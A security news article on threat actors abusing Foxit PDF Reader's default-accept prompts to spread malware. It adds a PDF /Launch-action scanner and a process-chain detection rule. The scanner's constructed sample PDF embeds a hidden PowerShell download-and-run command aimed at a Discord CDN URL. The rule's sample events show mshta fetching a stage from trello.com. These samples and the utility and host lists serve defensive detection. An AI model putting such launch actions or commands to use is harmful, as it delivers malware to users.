
Cybercriminals Exploit Foxit PDF Reader Flaw to Spread Malware and Evade Detection

Charles M. Walls | May 20, 2024


Cybercriminals are exploiting a design flaw in Foxit PDF Reader to deploy various malware strains, including Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm.

"This vulnerability prompts security warnings that could mislead unsuspecting users into executing dangerous commands," reported Check Point in a technical analysis. "This flaw has been leveraged by diverse threat actors, from cybercriminals to spies."

Notably, Adobe Acrobat Reader, the application most sandboxes and antivirus engines use to open PDFs during analysis, does not show this behaviour and so runs nothing when it opens one of these files. That mismatch between the analysis environment and the victim's reader is a large part of why the campaign's detection rate is so low.

The problem lies in the dialog Foxit PDF Reader shows before enabling document features that are disabled by default for security reasons: it asks the user whether to trust the document, and the pre-selected button is "OK".

If the user accepts, a second dialog warns that the file is about to execute additional commands, and there the pre-selected button is "Open". Accepting that runs the command embedded in the document; in the observed campaigns it downloaded and executed a payload from Discord's content delivery network (CDN).

"Even if the user reads the first message, they will likely agree to the second without reading," noted security researcher Antonis Terefos.

"Threat actors exploit this flawed logic and common human behavior, which makes the default choice the most harmful one," Terefos added.
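Because the reader prompts only when a document carries an action that runs a command, the document itself is the cheapest place to look. The scanner below is an added example, not code from Check Point, Foxit, or this article: it walks raw PDF bytes for /Launch action dictionaries and reports the program, its arguments, any URL hosts, and any download or script utilities on the command line. It assumes the command is carried by a /Launch action in the catalog's /OpenAction, which the article does not state, and the two sample PDFs, their cmd.exe/PowerShell command line and the Discord URL in them are constructed for the example.

```python
"""Static check for PDFs that launch a command through a /Launch action.

Added example, not Check Point's or Foxit's code. Sample PDFs are constructed;
the /OpenAction + /Launch layout is an assumption about the campaign files.
"""
import re
from dataclasses import dataclass, field

# Utilities whose presence in a Launch action means "downloader", not "open a file".
LOLBINS = ("cmd", "powershell", "pwsh", "mshta", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "bitsadmin", "curl")
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)")

# Constructed sample: the catalog's OpenAction is a Windows Launch action that
# has cmd.exe run PowerShell to fetch and start an executable from Discord's CDN.
MALICIOUS_PDF = rb"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R
   /OpenAction << /S /Launch /Win << /F (cmd.exe)
      /P (/c powershell -w hidden -c "iwr https://cdn.discordapp.com/attachments/0000/0000/update.exe -o %TEMP%\\update.exe; start %TEMP%\\update.exe") >> >> >>
endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
# Constructed sample: a Launch action that only opens a text file (worth a look, not an alert).
BENIGN_LAUNCH_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /Launch /F (notes.txt) >> >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def read_literal(data: bytes, start: int) -> tuple[bytes, int]:
    """Parse a PDF literal string '( ... )' at data[start]: nested parens and
    backslash escapes per ISO 32000-1 7.3.4.2. Returns (bytes, index past ')')."""
    assert data[start:start + 1] == b"("
    depth, i, out = 1, start + 1, bytearray()
    while i < len(data) and depth:
        c = data[i:i + 1]
        if c == b"\\":                       # \( \) \\ \n \r \t and friends
            nxt = data[i + 1:i + 2]
            out += {b"n": b"\n", b"r": b"\r", b"t": b"\t"}.get(nxt, nxt)
            i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                i += 1
                break
        out += c
        i += 1
    return bytes(out), i


def dict_at(data: bytes, start: int) -> bytes:
    """Return the balanced '<< ... >>' dictionary beginning at data[start]."""
    depth, i = 0, start
    while i < len(data):
        if data.startswith(b"<<", i):
            depth, i = depth + 1, i + 2
        elif data.startswith(b">>", i):
            depth, i = depth - 1, i + 2
            if depth == 0:
                return data[start:i]
        elif data[i:i + 1] == b"(":
            _, i = read_literal(data, i)     # strings may legally contain << or >>
        else:
            i += 1
    return data[start:]


def _param(action: bytes, key: bytes) -> bytes:
    """Literal-string value of /key inside one action dictionary, or b''."""
    m = re.search(rb"/" + key + rb"\s*\(", action)
    return read_literal(action, m.end() - 1)[0] if m else b""


@dataclass
class Finding:
    program: str
    params: str
    hosts: list[str] = field(default_factory=list)
    lolbins: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.hosts or self.lolbins)


def scan_pdf(data: bytes) -> list[Finding]:
    """One Finding per /Launch action in the raw (already inflated) PDF bytes."""
    findings = []
    for m in re.finditer(rb"/S\s*/Launch\b", data):
        # Nearest '<<' before '/S /Launch' opens the action dictionary; this
        # assumes /S precedes any nested dictionary, which writers in practice do.
        start = data.rfind(b"<<", 0, m.start())
        action = dict_at(data, start) if start != -1 else data[m.start():]
        # /Win << /F (prog) /P (args) >> is the Windows form, bare /F the generic one.
        prog = _param(action, b"F").decode("latin-1")
        params = _param(action, b"P").decode("latin-1")
        cmdline = f"{prog} {params}".lower()
        findings.append(Finding(
            program=prog, params=params,
            hosts=URL_HOST.findall(cmdline),
            lolbins=[b for b in LOLBINS if re.search(rf"\b{b}\b", cmdline)],
        ))
    return findings


def is_suspicious(data: bytes) -> bool:
    return any(f.suspicious for f in scan_pdf(data))
```

The scanner reads raw bytes, so a file whose catalog lives in a compressed object stream must be inflated first (for instance `qpdf --qdf --object-streams=disable in.pdf out.pdf`), and a Launch action that merely opens a file is reported but not flagged; the decision rests on what the command line contains.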

Check Point identified a military-themed PDF document that, when opened with Foxit PDF Reader, executed a command to download a tool that fetched two executables. These executables collected and uploaded data, such as documents, images, archive files, and databases, to a command-and-control (C2) server.

Further investigation revealed that the downloader could also deploy a third payload to capture screenshots of the infected system, which were then uploaded to the C2 server.

This activity, likely aimed at espionage, has been linked to the DoNot Team (also known as APT-C-35 and Origami Elephant), based on similarities with previously observed tactics and techniques associated with this group.

In another instance, the same technique was used in a multi-stage attack to deploy a stealer and two cryptocurrency miner modules, XMRig and lolMiner. Some of these malicious PDF files were distributed via Facebook.

The Python-based stealer is designed to take credentials and cookies from the Chrome and Edge browsers. The miners were retrieved from a GitLab repository belonging to a user named topworld20241; the repository was created on February 17, 2024, and was still active at the time of the report.

Another case documented by Check Point involved a PDF file that retrieved Blank-Grabber from Discord's CDN. Blank-Grabber is an open-source information stealer that was available on GitHub until the repository was archived on August 6, 2023.

"One interesting incident involved a malicious PDF with a hyperlink to an attachment hosted on trello[.]com," Terefos said. "Downloading it revealed a secondary PDF file containing malicious code, exploiting Foxit Reader users."

This infection pathway ended in the delivery of Remcos RAT, but only after a chain of intermediate stages involving LNK files, HTML Application (HTA) files, and Visual Basic scripts.
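On the endpoint, chains like that one share a root: the PDF reader spawns a command interpreter or script host that should never be its child. The rule below is an added example, not code from Check Point, Foxit, or this article. It walks process-creation events in a Sysmon-like shape (pid, parent pid, image, command line), alerts on every script host that descends from a Foxit reader process, and records the chain plus any URL hosts seen along it; the events, the FoxitPDFReader.exe image name and the trello.com URL are constructed for the example.

```python
"""Hunt process telemetry for PDF readers spawning command or script hosts.

Added example, not Check Point's or Foxit's code. The events and image names
below are constructed; real telemetry has more fields than these four.
"""
import ntpath
import re
from dataclasses import dataclass

PDF_READERS = {"foxitpdfreader.exe", "foxitreader.exe", "foxitphantompdf.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Hosting services the reported campaigns used as stage servers.
ABUSED_HOSTS = {"cdn.discordapp.com", "gitlab.com", "trello.com"}
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)")


@dataclass
class Event:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return ntpath.basename(self.image).lower()


@dataclass
class Alert:
    reader_pid: int
    pid: int
    chain: list[str]   # image names from the reader down to the flagged process
    hosts: list[str]   # URL hosts seen on any command line in the chain
    severity: str      # "high" when one of the abused services appears


FOXIT = r"C:\Program Files\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe"
TRELLO = "https://trello.com/1/cards/0000/attachments/0000/download/stage.hta"
EVENTS = [  # constructed: one malicious chain, one idle reader, one unrelated cmd.exe
    Event(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(4120, 1000, FOXIT, r'"FoxitPDFReader.exe" C:\Users\u\Downloads\invoice.pdf'),
    Event(5000, 4120, r"C:\Windows\System32\cmd.exe", f"cmd.exe /c mshta {TRELLO}"),
    Event(5010, 5000, r"C:\Windows\System32\mshta.exe", f"mshta {TRELLO}"),
    Event(5020, 5010, r"C:\Windows\System32\wscript.exe",
          r"wscript.exe C:\Users\u\AppData\Local\Temp\stage.vbs"),
    Event(6000, 1000, FOXIT, '"FoxitPDFReader.exe" report.pdf'),        # benign: no children
    Event(6100, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),  # benign: explorer child
]


def reader_chain(e: Event, by_pid: dict[int, Event], max_depth: int = 32):
    """Return [reader, ..., e] if a PDF reader is an ancestor of e, else None."""
    chain, cur = [e], e
    for _ in range(max_depth):            # bounded: pid reuse can produce cycles
        parent = by_pid.get(cur.ppid)
        if parent is None or parent is cur:
            return None
        chain.append(parent)
        if parent.name in PDF_READERS:
            return chain[::-1]
        cur = parent
    return None


def detect(events: list[Event]) -> list[Alert]:
    """One alert per script host whose ancestry leads back to a PDF reader."""
    by_pid = {e.pid: e for e in events}   # production code should key on a process GUID
    alerts = []
    for e in events:
        if e.name not in SCRIPT_HOSTS:
            continue
        chain = reader_chain(e, by_pid)
        if chain is None:
            continue
        hosts = sorted({h for c in chain for h in URL_HOST.findall(c.cmdline.lower())})
        alerts.append(Alert(
            reader_pid=chain[0].pid, pid=e.pid,
            chain=[ntpath.basename(c.image) for c in chain], hosts=hosts,
            severity="high" if ABUSED_HOSTS & set(hosts) else "medium",
        ))
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a.severity, a.reader_pid, " -> ".join(a.chain), a.hosts)
```

Each process in the chain raises its own alert, so a SIEM should group on reader_pid; the rule fires only on script hosts because Foxit does legitimately spawn its own updater and helper processes, which a rule on "any child" would flood on.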

The threat actor behind the Remcos RAT campaign, known as silentkillertv, claims to be an ethical hacker with over 22 years of experience. They have been observed promoting various malicious tools via a Telegram channel called silent_tools, including crypters and PDF exploits targeting Foxit PDF Reader. This channel was created on April 21, 2022.

Check Point also identified .NET- and Python-based PDF builder services like Avict Softwares I Exploit PDF, PDF Exploit Builder 2023, and FuckCrypt, which were used to create the malware-laced PDF files. The DoNot Team reportedly used a .NET PDF builder available on GitHub.

The use of platforms like Discord, GitLab, and Trello highlights the ongoing abuse of legitimate websites by threat actors to blend in with normal network traffic, evade detection, and distribute malware. Foxit has acknowledged the issue and plans to release a fix in version 2024.3; at the time of the report the current version was 2024.2.1.25153. Until that release ships, a Foxit PDF Reader user is protected only by declining both prompts.

"Although this exploit doesn't traditionally trigger malicious activities, it can be seen as a form of phishing or manipulation, tricking Foxit PDF Reader users into habitually clicking 'OK' without understanding the risks," Terefos explained.

"The high infection success rate and low detection allow these malicious PDFs to be distributed via unconventional methods, such as Facebook, without being intercepted by detection rules," he concluded.
